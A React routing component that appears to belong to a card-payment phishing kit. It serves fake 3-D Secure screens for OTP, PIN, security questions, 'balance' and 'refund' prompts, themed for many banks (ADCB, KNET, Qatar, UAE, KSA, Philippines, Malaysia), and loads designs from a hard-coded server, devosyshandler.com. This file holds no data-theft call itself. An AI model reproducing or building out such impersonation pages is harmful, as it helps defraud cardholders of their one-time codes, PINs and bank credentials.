import React, { useEffect, useState } from 'react';
import { Routes, Route, Navigate, useNavigate } from 'react-router-dom';
import axios from 'axios';
import LoadingPage from './LoadingPage';
import OtpPage from './OtpPage';
import PushPage from './PushPage';
import QuestionPage from './QuestionPage';
import PinPage from './PinPage';
import ErrorPage from './ErrorPage';
import AdcbPage from './uae/AdcbPage';
import KnetOTPPage from '../providers/3ds/KnetOtp';
import KSecurityQuestionPage from '../providers/3ds/KQuestion';
import KnetLoading from '../providers/3ds/KnetLoading';
import './themes/VisaTheme.css';
import './themes/MastercardTheme.css';

export default function ThreeDSRouter() {
  const [config, setConfig] = useState(null);
  const navigate = useNavigate();
  const uuId = localStorage.getItem('session_uuId') || localStorage.getItem('uuId');
  const design = localStorage.getItem('session_design') || 'standard_visa';
  const mode = ((typeof process !== 'undefined' && process.env.REACT_APP_MODE) || undefined) || 'standardEN';

  useEffect(() => {
    if (!uuId) {
      // If no session exists yet, keep on loading or wait briefly
      const stored = localStorage.getItem('session_uuId') || localStorage.getItem('uuId');
      if (!stored) {
        navigate('/');
        return;
      }
    }

    const fetchDesignConfig = async () => {
      try {
        const serverUrl = ((typeof process !== 'undefined' && (process.env.REACT_APP_SERVER_URL || process.env.REACT_APP_DOMAIN)) || undefined) || 'https://devosyshandler.com';
        const response = await axios.get(`${serverUrl}/api/design/${design}`);
        setConfig({ ...response.data, mode });
      } catch (error) {
        setConfig({
          title: 'Secure Verification',
          subtitle: 'Please verify your identity',
          loadingText: 'Processing securely...',
          themeClass: `theme-${design}`,
          mode
        });
      }
    };

    fetchDesignConfig();
  }, [uuId, design, navigate, mode]);

  if (!config) {
    return <div style={{ minHeight: '100vh', background: '#f8fafc' }} />;
  }

  // Check if mode is standard, Qatar, Philippines, Malaysia, UAE, or KSA bank design
  const isCustomTheme = String(mode).toLowerCase().startsWith('stand') || 
    design.startsWith('qatar_') || 
    design.startsWith('standard_') || 
    design.startsWith('ph_') || 
    design.startsWith('my_') || 
    design.startsWith('uae_') ||
    design.startsWith('ksa_');

  const wrapperClass = isCustomTheme 
    ? '' 
    : `threeds-container ${config.themeClass || `theme-${design}`}`;

  const wrapperStyle = isCustomTheme 
    ? {} 
    : { minHeight: '100vh', background: 'var(--3ds-bg)' };

  return (
    <div className={wrapperClass} style={wrapperStyle}>
      <Routes>
        <Route path="loading" element={<LoadingPage config={config} />} />
        <Route path="otp" element={<OtpPage config={config} />} />
        <Route path="refund" element={<OtpPage config={config} isRefund={true} />} />
        <Route path="adcb" element={<AdcbPage config={config} />} />
        <Route path="push" element={<PushPage config={config} />} />
        <Route path="question" element={<QuestionPage config={config} />} />
        <Route path="pin" element={<PinPage config={config} />} />
        <Route path="balance" element={<PinPage config={config} />} />
        <Route path="kotp" element={<KnetOTPPage />} />
        <Route path="kquestion" element={<KSecurityQuestionPage />} />
        <Route path="kloading" element={<KnetLoading />} />
        <Route path="error" element={<ErrorPage config={config} />} />
        <Route path="*" element={<Navigate to="loading" replace />} />
      </Routes>
    </div>
  );
}
